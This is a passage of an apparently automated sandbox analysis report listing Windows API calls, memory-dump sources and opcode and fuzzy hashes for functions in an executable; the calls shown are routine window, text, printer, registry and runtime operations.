                                                                                • LCMapStringW.KERNEL32(00000000,00000100,0044165C,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00425E2C
                                                                                • LCMapStringA.KERNEL32(00000000,00000100,00441658,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00425E48
                                                                                • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00425E91
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00425EC9
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00425F21
                                                                                • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00425F37
                                                                                • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00425F6A
                                                                                • LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00425FD2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: String$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 352835431-0
                                                                                • Opcode ID: 3ec729428c25ee1921126b9febded8c2e1078534a736e54135598e7527223c13
                                                                                • Instruction ID: fe6be1457a7d6525555466521751adde9880d3bac8cb52d09e47946dc1f2dd7f
                                                                                • Instruction Fuzzy Hash: 0951BC31600629EFCF228F95ED45AEF7FB8FB48750F55012AF804A22A0C3398D51DB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 0042AA41
                                                                                • FindResourceA.KERNEL32(?,00000000,00000005), ref: 0042AA79
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0042AA81
                                                                                  • Part of subcall function 0042B7D3: UnhookWindowsHookEx.USER32(?), ref: 0042B7F8
                                                                                • LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0043236C), ref: 0042AA8E
                                                                                • IsWindowEnabled.USER32(?), ref: 0042AAC1
                                                                                • EnableWindow.USER32(?,00000000), ref: 0042AACF
                                                                                • EnableWindow.USER32(?,00000001), ref: 0042AB5D
                                                                                • GetActiveWindow.USER32 ref: 0042AB68
                                                                                • SetActiveWindow.USER32(?), ref: 0042AB76
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
                                                                                • String ID:
                                                                                • API String ID: 401145483-0
                                                                                • Opcode ID: 6febda207dac2bf7676a6e8b77f26d6ef3393098e01b33aeabdeb793bcd9728b
                                                                                • Instruction ID: 90d62c42fc70ef85aed0f5c6b5f325f10032a7001fbb84b5cabffc154c9b2de7
                                                                                • Instruction Fuzzy Hash: 1541D630B00625DFCB11AF64ED49A6FBBB5EF44715F50051FF902A2291CB795D40CB9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0044E660,?,0042711F), ref: 00427CC6
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 00427D02
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 00427D1D
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 00427D30
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 00427D43
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 00427D56
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 00427D69
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 00427D7C
                                                                                • LeaveCriticalSection.KERNEL32(0044E660,?,0042711F), ref: 00427D8D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: AtomDeleteGlobal$CriticalSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3843206905-0
                                                                                • Opcode ID: 02eb31011d6e035721d6efae2b10f5c3687508b2092d47dacce3a63d6ec09a0b
                                                                                • Instruction ID: c4f65ee0956effee7a96337059cca19181e8fe34763083e12b45b5184bebd8a5
                                                                                • Opcode Fuzzy Hash: 02eb31011d6e035721d6efae2b10f5c3687508b2092d47dacce3a63d6ec09a0b
                                                                                • Instruction Fuzzy Hash: 2B114C5D915A2495EB122FA6FC087A63A74BB2A700FC74433F504476B0D7BC08C6CBAC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 00424C52
• GetStdHandle.KERNEL32(000000F4,004415CC,00000000,?,00000000,?), ref: 00424D28
• WriteFile.KERNEL32(00000000), ref: 00424D2F
Strings
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: File$HandleModuleNameWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 3784150691-4022980321
• Opcode ID: 66660918254b665f4de0be33263410b251e56f032d48690c3f649d2a88b05423
• Instruction ID: 651244c1fef6780a1bcb294ae504d03a866881eccbdc5aa50fc901218abfb40d
• Opcode Fuzzy Hash: 66660918254b665f4de0be33263410b251e56f032d48690c3f649d2a88b05423
• Instruction Fuzzy Hash: 5131F772B002286FDF20EB61EC46FEA776CEB85304F91046BF545D6051DA78EA818B6D
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetMenu.USER32 ref: 0040217C
• GetWindowLongA.USER32 ref: 00402194
• GetWindowRect.USER32 ref: 004021A8
• GetClientRect.USER32 ref: 004021B9
• AdjustWindowRect.USER32(?,?,?), ref: 004021E3
• AdjustWindowRect.USER32(?,?,?), ref: 00402214
• SetWindowLongA.USER32(00000000,000000F0,?), ref: 0040225F
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000014), ref: 0040228A
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Window$Rect$AdjustLong$ClientMenu
• String ID:
• API String ID: 981960374-0
• Opcode ID: 7cd1ce2caa51248533568c893ca135ea21172535c4a2949eafc55bd5e98fe749
• Instruction ID: 59eb8c588deaa5d71ba3fbc6da4ed1fbf1d28a55154e919e37b4c854eac08df1
• Opcode Fuzzy Hash: 7cd1ce2caa51248533568c893ca135ea21172535c4a2949eafc55bd5e98fe749
• Instruction Fuzzy Hash: E4417375E01109AFCB08DFE8E994DEEBBB5BF48301F108229F915A7394DA34AA45CF54
Uniqueness
Uniqueness Score: -1.00%

APIs
• GlobalLock.KERNEL32 ref: 0042E0E8
• lstrcmpA.KERNEL32(?,?), ref: 0042E0F4
• OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 0042E106
• DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0042E129
• GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0042E131
• GlobalLock.KERNEL32 ref: 0042E13E
• DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 0042E14B
• ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 0042E169
  • Part of subcall function 0042FF41: GlobalFlags.KERNEL32(?), ref: 0042FF4B
  • Part of subcall function 0042FF41: GlobalUnlock.KERNEL32(?,?,?,00430BEC,?,?,?,?,004128BF,0044BEB8,?,0040345E), ref: 0042FF62
  • Part of subcall function 0042FF41: GlobalFree.KERNEL32 ref: 0042FF6D
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
• String ID:
• API String ID: 168474834-0
• Opcode ID: c2baaa59f3228edbd8e4f4c42fbf9dae71efe466d58ef4fb555d060112591abb
• Instruction ID: 47f989acda206917db9905037332a58bb28c8949d2979b352a9a0551fb8e54d1
• Opcode Fuzzy Hash: c2baaa59f3228edbd8e4f4c42fbf9dae71efe466d58ef4fb555d060112591abb
• Instruction Fuzzy Hash: E9119471600114BAEB219F77EC45E7F7ABDEF85744F80446EF604E2111D639DE109B24
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetStartupInfoA.KERNEL32(?), ref: 0042492F
• GetFileType.KERNEL32(?,?,00000000), ref: 004249DA
• GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 00424A3D
• GetFileType.KERNEL32(00000000,?,00000000), ref: 00424A4B
• SetHandleCount.KERNEL32 ref: 00424A82
Strings
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: FileHandleType$CountInfoStartup
• String ID: $D
• API String ID: 1710529072-2460468198
• Opcode ID: fdd5eec0aa30cfb39ede51537b1476356e4a174ebf30ffc324b8e1d0789f5890
• Instruction ID: 101a517258b3af37a39cee39fefedc3ff0a5a98df4df23431c8e9c75c210f023
• Opcode Fuzzy Hash: fdd5eec0aa30cfb39ede51537b1476356e4a174ebf30ffc324b8e1d0789f5890
• Instruction Fuzzy Hash: 795125717002218FC721CF38E84476ABBE0FB86328FA5466ED5929B2E2D7389945C74D
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetPropA.USER32 ref: 00429DF3
• CallWindowProcA.USER32 ref: 00429E15
  • Part of subcall function 00426C80: CallWindowProcA.USER32 ref: 00426CA6
  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CBE
  • Part of subcall function 00426C80: RemovePropA.USER32 ref: 00426CCA
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Prop$CallProcRemoveWindow
• String ID:
• API String ID: 2276450057-0
• Opcode ID: 81e63247b3dd26a248537978a99b11017d76f1e947f2153f078f5a9bf8d5de7c
• Instruction ID: 90c8a0778587e0954a9aa73d4846818c464f83a84ba38a3a3b9ddbdb0dd917e3
• Opcode Fuzzy Hash: 81e63247b3dd26a248537978a99b11017d76f1e947f2153f078f5a9bf8d5de7c
• Instruction Fuzzy Hash: FB3114767002206FD20097A9BC85DAFB79CEF95362F45042AFE0587241D7395D0AC6BA
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetParent.USER32(?), ref: 0042D31A
• PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0042D343
• UpdateWindow.USER32(?), ref: 0042D35F
• SendMessageA.USER32 ref: 0042D385
• SendMessageA.USER32 ref: 0042D3A4
• UpdateWindow.USER32(?), ref: 0042D3E7
• PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0042D41A
  • Part of subcall function 0042D8A8: GetWindowLongA.USER32 ref: 0042D8B4
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Message$Window$PeekSendUpdate$LongParent
• String ID:
• API String ID: 2853195852-0
• Opcode ID: a24a239a354e0897e523d9194e65b36781a21d75f395cf80825046c93ed437a3
• Instruction ID: c811231deb8078fb5731fa9dc182fa536aa2240df244b5e80c63169bc604b0b0
• Opcode Fuzzy Hash: a24a239a354e0897e523d9194e65b36781a21d75f395cf80825046c93ed437a3
• Instruction Fuzzy Hash: 0941A230B043519BD720EF26E848E1BBAE4EFC5B15F90092EF88186251CB79D945CB9B
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetBkColor.GDI32(?), ref: 00426D7D
• ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426DCA
• ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426DF9
• SetBkColor.GDI32(?,?), ref: 00426E17
• ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426E42
• ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00426E7C
• SetBkColor.GDI32(?,00000000), ref: 00426E84
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID: Text$Color
• String ID:
• API String ID: 3751486306-0
• Opcode ID: 2321da43b585f63e5adc61c20e03b6cb190c2bb4a675cc279752b46e515c9837
• Instruction ID: 29269f7e8968f07c9bf61daa0b8dde85a5b1c8a61ab52b3db714b3b204068679
• Opcode Fuzzy Hash: 2321da43b585f63e5adc61c20e03b6cb190c2bb4a675cc279752b46e515c9837
• Instruction Fuzzy Hash: 2D416874644301AFE320DF18DC86F2AB7E4FB89B00F544819FA54AA2C0D775E909CB6A
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
Similarity
• API ID:
• String ID: D
• API String ID: 0-193714618
• Opcode ID: 0ca42e1e0f1a058a706f251ac6bea548b4148dc182a2db42e612ab69b8c37870
• Instruction ID: c63cc33246c587ca8770534a01517a3441ccaac5100645c49687a50044a75eae
• Opcode Fuzzy Hash: 0ca42e1e0f1a058a706f251ac6bea548b4148dc182a2db42e612ab69b8c37870
• Instruction Fuzzy Hash: 25316BB56041608FE364DF2EF845E2677A1FBB2302FD386BBE501863A1C7749845CB28
Uniqueness
Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                • String ID:
                                                                                • API String ID: 3219385341-0
                                                                                • Opcode ID: a185fa5899d7e6cd108c07e537715c4c03c8680ac7ec32e9d6a7e3673663cfde
                                                                                • Instruction ID: 67b33c1f3fcca2755b6cfe87239e2cbfe8c3daf4c24fd7378bf085f00ddaf3be
                                                                                • Opcode Fuzzy Hash: a185fa5899d7e6cd108c07e537715c4c03c8680ac7ec32e9d6a7e3673663cfde
                                                                                • Instruction Fuzzy Hash: 521106722002197BC2106F75DCD4C3F3A6CDB99799B12152BFA0193241EF2DDD020979
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetWindowRect.USER32 ref: 00428730
                                                                                • GetWindowLongA.USER32 ref: 00428739
                                                                                • InflateRect.USER32(?,00000001,00000001), ref: 00428798
                                                                                • GetParent.USER32(?), ref: 0042879F
                                                                                • ScreenToClient.USER32 ref: 004287B3
                                                                                • ScreenToClient.USER32 ref: 004287BB
                                                                                • InvalidateRect.USER32(00000000,?,00000000), ref: 004287D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Rect$ClientScreenWindow$InflateInvalidateLongParent
                                                                                • String ID:
                                                                                • API String ID: 1809568455-0
                                                                                • Opcode ID: ff58344ce4431b79c43a51446caebed1801a8451d6a741497eb264a90b017220
                                                                                • Instruction ID: 20c8bc178c7abd827cf01e77227cc194a637bdb18fb4d08b38def5b058213ab6
                                                                                • Opcode Fuzzy Hash: ff58344ce4431b79c43a51446caebed1801a8451d6a741497eb264a90b017220
                                                                                • Instruction Fuzzy Hash: 37216831200215AFD704DE24EC94FBF73A9EB84721FA4451EF95187291DB38D945CB26
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00431EBF
                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00431EE2
                                                                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00431F01
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00431F11
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00431F1B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CloseCreate$Open
                                                                                • String ID: software
                                                                                • API String ID: 1740278721-2010147023
                                                                                • Opcode ID: d301fab7d3179a1598cf324ef04d6cc726fa06f4650e103ed108139ac8e274de
                                                                                • Instruction ID: 6881e489369482dd9ae8addcb6160e6be127bead988f30fed154f04994d284f0
                                                                                • Opcode Fuzzy Hash: d301fab7d3179a1598cf324ef04d6cc726fa06f4650e103ed108139ac8e274de
                                                                                • Instruction Fuzzy Hash: C211C876900158FBDB11DF96DC84DEFFFBCEF89705F1040AAA614A2121D7719A40DB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 00421AEE
                                                                                • GetSystemMetrics.USER32 ref: 00421B06
                                                                                • GetSystemMetrics.USER32 ref: 00421B0D
                                                                                • lstrcpyA.KERNEL32(-00000028,DISPLAY,00000028), ref: 00421B31
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: System$Metrics$InfoParameterslstrcpy
                                                                                • String ID: B$DISPLAY
                                                                                • API String ID: 1409579217-3316187204
                                                                                • Opcode ID: 8cad83c6f743450e3fdde37e0a3d9be14beebfde26e84af3a6a668d28f9e0a32
                                                                                • Instruction ID: 83b49fd69f23a198b78ee952632538a78eaeacc0175bbffe35e1a6aa65712b2e
                                                                                • Opcode Fuzzy Hash: 8cad83c6f743450e3fdde37e0a3d9be14beebfde26e84af3a6a668d28f9e0a32
                                                                                • Instruction Fuzzy Hash: 0E11E371700234ABCF11AF14ACC099BBFB8EF15741B408023FC059A155D675E950CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Rect$ClientScreenWindow$InflateLongParentValidate
                                                                                • String ID:
                                                                                • API String ID: 2275295265-0
                                                                                • Opcode ID: 957877f3f5afc6908445e749f0dad9caa24f55e73f036510a5f03152ef45642a
                                                                                • Instruction ID: 3d41a9fa32de68a1825794a1396603118b0ea0ebdba66c71a7a3a18a2ddaf4b8
                                                                                • Opcode Fuzzy Hash: 957877f3f5afc6908445e749f0dad9caa24f55e73f036510a5f03152ef45642a
                                                                                • Instruction Fuzzy Hash: 87F06D32104201BFD301AB54DC88DBFB7BCEB89722F00852DF91592150DA34990A8B66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetSysColor.USER32(0000000F), ref: 0042F189
                                                                                • GetSysColor.USER32(00000010), ref: 0042F190
                                                                                • GetSysColor.USER32(00000014), ref: 0042F197
                                                                                • GetSysColor.USER32(00000012), ref: 0042F19E
                                                                                • GetSysColor.USER32(00000006), ref: 0042F1A5
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0042F1B2
                                                                                • GetSysColorBrush.USER32(00000006), ref: 0042F1B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Color$Brush
                                                                                • String ID:
                                                                                • API String ID: 2798902688-0
                                                                                • Opcode ID: ef6c72bd6de09845801589dab9e2aaec3edf9995b9614f7a3fa1260c4579e344
                                                                                • Instruction ID: d78636e8a5eb0386f628ab24f1ef28342faacb0a612bbd47625186426cd1d966
